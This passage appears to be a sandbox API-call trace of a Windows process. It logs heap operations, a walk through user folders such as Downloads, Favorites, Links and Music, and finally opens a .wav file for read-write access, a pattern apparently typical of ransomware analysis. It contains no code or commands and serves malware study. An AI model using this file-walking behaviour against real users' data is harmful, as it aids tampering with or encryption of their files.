lpMsg=0x9f4fb74) returned 0 [0058.968] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b8c8 [0058.968] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.968] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.968] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b8c8 | out: hHeap=0x660000) returned 1 [0058.968] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b8c8 [0058.968] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.968] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.968] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b8c8 | out: hHeap=0x660000) returned 1 [0058.968] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b8c8 [0058.969] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.969] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.969] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b8c8 | out: hHeap=0x660000) returned 1 [0058.969] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b8c8 [0058.969] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.969] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.969] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b8c8 | out: hHeap=0x660000) returned 1 [0058.969] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b8c8 [0058.969] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.969] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.969] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b8c8 | out: hHeap=0x660000) returned 1 [0058.969] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b8c8 [0058.969] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0058.969] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.969] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b8c8 | out: hHeap=0x660000) returned 1 [0058.969] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b8c8 [0058.969] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.969] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0058.969] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.969] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.969] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b8c8 | out: hHeap=0x660000) returned 1 [0058.969] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b8c8 [0058.969] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.969] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.969] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b8c8 | out: hHeap=0x660000) returned 1 [0058.969] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b8c8 [0058.969] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0058.969] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.969] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b8c8 | out: hHeap=0x660000) returned 1 [0058.969] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b8c8 [0058.969] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.969] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.969] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b8c8 | out: hHeap=0x660000) returned 1 [0058.969] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b8c8 [0058.969] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.970] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.970] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b8c8 | out: hHeap=0x660000) returned 1 [0058.970] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b8c8 [0058.970] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\") returned="Downloads\\" [0058.970] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0058.970] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0058.970] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0058.970] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0058.970] PathFindFileNameW (pszPath="") returned="" [0058.970] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0058.970] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b8c8 | out: hHeap=0x660000) returned 1 [0058.970] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.970] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0058.970] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini") returned=".ini" [0058.970] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adb18 | out: hHeap=0x660000) returned 1 [0058.970] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0058.970] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0058.970] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0058.970] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bc70 | out: hHeap=0x660000) returned 1 [0058.970] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0058.970] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0058.971] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0058.971] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0058.971] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0058.971] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0058.971] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0058.971] PathFindFileNameW (pszPath="") returned="" [0058.971] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0058.971] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b8c8 | out: hHeap=0x660000) returned 1 [0058.971] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.971] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0058.971] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini") returned=".ini" [0058.971] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adb18 | out: hHeap=0x660000) returned 1 [0058.971] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0058.971] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Websites", cAlternateFileName="MICROS~1")) returned 1 [0058.971] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Websites", cAlternateFileName="MSNWEB~1")) returned 1 [0058.971] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 1 [0058.971] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 0 [0058.971] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0058.971] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0058.971] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bc70 | out: hHeap=0x660000) returned 1 [0058.971] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0058.972] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0058.972] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="Links\\" [0058.972] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0058.972] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0058.972] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0058.972] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0058.972] PathFindFileNameW (pszPath="") returned="" [0058.972] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0058.972] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261058 | out: hHeap=0x660000) returned 1 [0058.972] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.972] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0058.972] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini") returned=".ini" [0058.972] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3289860 | out: hHeap=0x660000) returned 1 [0058.972] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0058.972] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk") returned=".lnk" [0058.972] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3289860 | out: hHeap=0x660000) returned 1 [0058.972] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x3a1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0058.972] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk") returned=".lnk" [0058.972] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3289860 | out: hHeap=0x660000) returned 1 [0058.972] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 1 [0058.972] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk") returned=".lnk" [0058.972] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3289860 | out: hHeap=0x660000) returned 1 [0058.972] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0 [0058.973] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0058.973] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0058.973] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32619a0 | out: hHeap=0x660000) returned 1 [0058.973] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0058.973] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0058.973] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\") returned="Local Settings\\" [0058.973] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0058.973] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0058.973] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0058.973] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0058.973] PathFindFileNameW (pszPath="") returned="" [0058.973] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0xffffffff [0058.973] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bc08 | out: hHeap=0x660000) returned 1 [0058.973] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0058.973] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bc70 | out: hHeap=0x660000) returned 1 [0058.973] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0058.973] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0058.973] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0058.973] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0058.974] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0058.974] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0058.974] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0058.974] PathFindFileNameW (pszPath="") returned="" [0058.974] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x729fd50, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x729fd50, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0058.974] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261058 | out: hHeap=0x660000) returned 1 [0058.974] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x729fd50, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x729fd50, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.974] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1fed6af0, ftCreationTime.dwHighDateTime=0x1d4cc9a, ftLastAccessTime.dwLowDateTime=0x9d0d7770, ftLastAccessTime.dwHighDateTime=0x1d4d3af, ftLastWriteTime.dwLowDateTime=0x9d0d7770, ftLastWriteTime.dwHighDateTime=0x1d4d3af, nFileSizeHigh=0x0, nFileSizeLow=0xe431, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cwxc45T02ajINP1wUK.wav", cAlternateFileName="CWXC45~1.WAV")) returned 1 [0058.974] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\cwxc45T02ajINP1wUK.wav") returned=".wav" [0058.974] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\cwxc45T02ajINP1wUK.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\cwxc45t02ajinp1wuk.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.974] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: 